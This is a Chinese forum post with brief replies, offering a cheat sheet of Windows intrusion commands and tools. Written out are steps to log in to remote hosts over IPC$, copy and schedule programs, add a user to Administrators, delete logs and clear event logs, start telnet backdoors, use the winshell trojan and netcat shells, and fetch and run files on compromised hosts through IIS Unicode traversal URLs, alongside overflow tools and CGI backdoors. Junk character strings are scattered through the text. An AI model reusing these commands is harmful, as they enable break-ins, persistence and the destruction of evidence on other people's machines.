社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4029阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令  }vd*eexA  
常用的几条NET命令: @w[i%F,&`  
i q(PC3e`V  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" 'pdTV:]zA  
@X2*O9  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" \c=I!<9  
{*ak>Wud  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ $cCC 1=dW  
:]^e-p!z  
(查看远程主机时间) net time \\IP地址 Ej(J j\  
qLN^9PdEE  
(定时启动某个程序) at \\IP地址 02:18 readme.exe 2@&r!Q|1vR  
B`5<sW  
(查看共享) net view \\IP地址 g`7XE  
sHP -@  
(查看netbios工作组列表) nbtstat -A IP地址 eU?hin@X  
RLB3 -=9t  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" *T|B'80  
-4a9BE".  
(这两条把自己增加到管理员组): net user 用户名 密码 /add 1j<(?MT-  
z^gJy,T  
net localgroup Administrators 用户名 /add 1 DWoL}Z  
La26"C"X  
(断开连接) net use \\IP地址\ipc$ /delete ^mS |ff  
Ccf/hA#mb  
扫尾: +eM${JyXH  
rH+OXGoB  
del C:\winnt\system32\logfiles\*.* 3FEJ 9ZyG  
b'H'QY   
del C:\winnt\ssytem32\config\*.evt J3K=z  
7|P kc(O  
del C:\winnt\system32\dtclog\*.* )*,/L <  
gV_/t+jI  
del C:\winnt\system32\*.log ^u /%zL  
a^|DD#5  
del C:\winnt\system32\*.txt _]Hna<Ly  
(B7G'h.?  
del C:\winnt\*.txt 7io["zW  
i=8iK#2 h  
del C:\winnt\*.log @=Kq99=\U  
fV(3RG  
一、netsvc.exe Lpchla$  
5jdZC(q5a  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: qt GJJ#^,  
.1x04Np!  
netsvc /list \\IP地址 ]$ew 5%  
[uq>b|`R G  
netsvc schedule \\IP地址 /query <#63tN9  
THA9OXP  
netsvc \\IP地址 schedule /start #x%'U}sF  
90}{4&C.^  
二、OpenTelnet.exe L"L3n,%F  
&J[a.:..  
远程启动主机的Telnet服务,并绑定端口到7878,例如: 8s%/5v"  
,b+NhxdZ  
OpenTelnet \\IP地址 用户名 密码 1 7878 *dzZOe>,  
E*_^+ %  
然后就可以telnet到主机的7878端口,进入DOS方式下: i%glQT  
+8=$-E=  
telnet IP地址 7878 dj|5'<l2  
]|;+2@kDR  
三、winshell.exe Tt[zSlIMx  
BG{f)2F\  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: TQ Vk;&A  
2EY"[xK|  
p Path (查看winshell主程序的路径信息) ?mQ^"9^XS  
&v\F ah U  
b reBoot (重新启动机器) |Lq8cA)|y  
o<2GtF1"o  
d shutDown (关闭机器) _`$LdqgE  
 )vr@:PE  
s Shell (执行后你就会看到可爱的“C:\>”) J( }2Ua_  
@u3`lhUcT  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) 6Z/`p~e  
;`9f<d#\  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) Z5{a7U4z_  
?I.9?cQXZ  
四、3389登陆器,GUI方式登录远程主机的 4 23zX6  
ijI/z5  
五、elsave.exe k15vs  
)fH Q7  
事件日志清除工具 :fRXLe1=  
mp|pz%U  
elsave -s \\IP地址 -l "application" -C UNI< r  
I Mgd2qIC  
elsave -s \\IP地址 -l "system" -C p:,Y6[gMo  
+bjy#=  
elsave -s \\IP地址 -l "security" -C d{ (,Gy>I  
Fc[KIG3@  
执行后成功清除应用程序日志,系统日志,安全日志 $o"nTl  
k<1yv$/mW  
六、hbulot.exe l}{{7~C`  
BT_]=\zi  
开启win2kserver和winxp的3389服务 *2X6;~  
~/:vr  
hbulot [/r] h@)U,&  
h#rP]o@  
使用/r表示安装完成后自动重起目标使设置生效。 O-- p)\   
XLpP*VH3  
七、nc.exe(netcat.exe) [)H 6`w  
! \] ^c  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 #GsOE#*>T  
]{-.?W*$  
想要连接到某处: nc [-options] hostname port[s] [ports] ... jA? #!lx_  
N gNGq\!  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] Hg+<GML  
P{L=u74b{x  
参数: }v(wjD  
6*8Wtq  
-e prog 程序重定向,一旦连接,就执行 [危险!!] V>$( N/1  
"SF0b jG9C  
-g gateway source-routing hop point[s], up to 8 Y~~Dg?e  
wNONh`b  
-G num source-routing pointer: 4, 8, 12, ... ,'NasL8?We  
 *7Dba5B  
-h 帮助信息 bT,:eA  
|@ mz@  
-i secs 延时的间隔 xh6(~'$  
=;Id["+  
-l 监听模式,用于入站连接 0SpB 2>_  
h!"2Ux3!x  
-n 指定数字的IP地址,不能用hostname 8K8u|]i  
W? 7l-k=S  
-o file 记录16进制的传输 G1:}{a5i_  
s"(RdJ-,  
-p port 本地端口号 *k$[/{S1-  
D)*   
-r 任意指定本地及远程端口 O5dS$[`j\p  
<H[w0Z$  
-s addr 本地源地址 /i+z#q5'  
Q @}$b(b  
-u UDP模式 0'q4=!l  
H7O~So*N5  
-v 详细输出——用两个-v可得到更详细的内容 =4y gbk  
M!mL/*G@YE  
-w secs timeout的时间 Q G) s  
AbU`wr/h 4  
-z 将输入输出关掉——用于扫描时 $0*sj XV  
八、TFTPD32.EXE F?L]Dff  
t Zxx#v`  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: -oD,F $Rb  
Bz+oM N#XJ  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 +sNS  
QE<Z@/V*a  
然后可以直接令文件运行: OqGp|`  
.j6udiv5  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 $C16}^  
OT#@\/>  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 +)jUA]hJ/  
E4#{&sRT  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 \0@DOW22C  
=g% L$b<i  
一、一 Xscan命令行运行参数说明: 8jK=A2pTa  
glAS$<  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 eSPS3|YYn  
e8,_"_1 :F  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] "tEp8m  
1N5 E  
xscan -file <主机列表文件名> <检测项目> [其他选项] wl=tN{R  
opX07~1  
其中<检测项目> 含义如下: VO#rJ1J  
O[X*F2LC4  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); g 2Fg  
s5,@=(,  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); 8)B{x[?|  
Za.}bR6?Y  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); )! [B(  
B<W}:>3  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); VPCI5mS_  
^} j~:EZb  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ODJ"3 J  
N=mvr&arP  
[其他选项] 含义如下: KFM[caKeJO  
q 4BXrEOw  
-v: 显示详细扫描进度 &+9 ;  
&oL"AJU  
-p: 跳过Ping不通的主机 xvGYd,dlK  
z/Lb1ND8  
-o: 跳过没有检测到开放端口的主机 88Pt"[{1  
hV3]1E21"  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 @Y~gdK  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
10+5=?,请输入中文答案:十五